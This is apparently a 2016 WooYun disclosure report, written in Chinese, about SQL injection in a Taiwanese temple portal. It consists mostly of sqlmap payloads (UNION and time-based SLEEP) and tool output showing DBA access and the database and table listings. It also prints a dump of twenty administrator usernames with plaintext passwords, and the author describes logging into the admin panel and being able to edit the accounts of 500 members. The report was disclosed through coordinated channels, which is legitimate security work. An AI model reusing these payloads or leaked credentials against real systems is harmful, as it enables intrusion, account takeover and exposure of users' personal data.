当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171149

漏洞标题:台灣廟宇網主站又一处sql注入(dba权限/涉及6裤/20管理员明文密码/后台管理500会员密码)(臺灣地區)

相关厂商:台灣廟宇網

漏洞作者: 路人甲

提交时间:2016-01-20 16:12

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

求个首页

详细说明:

注入点:

http://**.**.**.**/temple/intro_t_photob.php?tp_id=138&p=4


参数tp_id 和刚刚的是不是很像,不要看错了哦

Place: GET
Parameter: tp_id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: tp_id=-1838 UNION SELECT NULL, NULL, NULL, NUL
(0x3a756f703a,0x57564e48555167476342,0x3a7369613a)#&p=4
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tp_id=138 AND SLEEP(5)&p=4
---
[17:22:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP
back-end DBMS: MySQL 5.0.11
[17:22:43] [INFO] fetching current user
current user:    'www@localhost'


[17:24:53] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.17
back-end DBMS: MySQL 5.0.11
[17:24:53] [INFO] testing if current user is DBA
[17:24:53] [INFO] fetching current user
current user is DBA:    'True'


available databases [6]:
[*] information_schema
[*] mysql
[*] nightnews
[*] performance_schema
[*] test
[*] www


Database: www
[42 tables]
+--------------------+
| ad                 |
| admin              |
| article            |
| car_article        |
| car_experience     |
| car_factory        |
| car_forum          |
| car_newcar         |
| car_re_forum       |
| car_re_sh          |
| car_sales_rank     |
| car_second_hand    |
| car_type           |
| catalog            |
| customer           |
| dong_lin           |
| epaper_log         |
| forum_posts        |
| forum_topics       |
| headline           |
| information        |
| maillist           |
| member_data        |
| nalog3_config_idn  |
| nalog3_counter_idn |
| nalog3_data        |
| nalog3_dlog_idn    |
| nalog3_log_idn     |
| nalog3_now_idn     |
| nalog3_os          |
| retrospect_cata    |
| retrospect_pic     |
| temple             |
| temple_deities     |
| temple_forum       |
| temple_knowledge   |
| temple_news        |
| temple_pic         |
| temple_re_forum    |
| vote               |
| vote_data          |
| wp_tmp             |
+--------------------+


20位管理员明文密码

[20 entries]
+----------------+---------------------+---------+---------+--------------+
| auth           | lastlogin           | mcatid  | mid     | pwd          |
+----------------+---------------------+---------+---------+--------------+
| chief editor   | 2000-00-00 00:00:00 | 1       | bob     | 123456       |
| general editor | 2012-10-23 13:23:16 | <blank> | andy    | 123456       |
| chief editor   | 2012-10-23 17:50:24 | 1       | ah      | 12345        |
| editor         | 2005-07-16 00:55:47 | 1       | ai      | 1234         |
| chief editor   | 2010-09-20 17:18:24 | 4       | df      | 1234         |
| chief editor   | 2011-03-22 10:50:02 | 4       | dg      | 12345        |
| editor         | 2008-07-12 09:35:23 | 4       | ea      | 1234         |
| chief editor   | 2012-10-08 15:18:40 | 5       | ihh     | 1234         |
| editor         | 2012-07-03 10:38:18 | 2       | linda   | 123456       |
| chief editor   | 2012-10-22 20:47:09 | 1       | abcd    | 12345        |
| chief editor   | 2007-09-07 18:34:32 | 5       | ccl     | 2086         |
| editor         | 2012-10-08 15:17:52 | 4       | ei      | 1234         |
| chief editor   | 2012-06-26 17:09:25 | 1       | gina    | 1234         |
| chief editor   | 2012-10-24 10:12:30 | 3       | kofang  | 1234         |
| chief editor   | 2011-06-26 15:58:56 | 1       | askw    | 12345        |
| general editor | 2012-10-24 11:27:17 | <blank> | charles | 513789       |
| chief editor   | 2009-07-14 22:56:34 | 1       | guisin  | 1234         |
| chief editor   | 2012-10-24 12:14:02 | 2       | joanne  | 12345        |
| general editor | 2012-10-24 14:23:06 | 4       | sarlin  | cw5898cl0178 |
| chief editor   | 2012-10-23 22:24:06 | 2       | cheng   | 123456       |
+----------------+---------------------+---------+---------+--------------+


就用ai来测试入后台

http://**.**.**.**/admin/edit.php


AI17A6$}X1$~]$8R09K2R}S.png


来看会员数据,每页20位。总共26页。500多会员

@GRXVS`SKE2BYL~}1`@7L26.png


可以随便修改资料 密码

7NH)9R[DE37{S@{7HIOAPTR.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-22 01:15

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价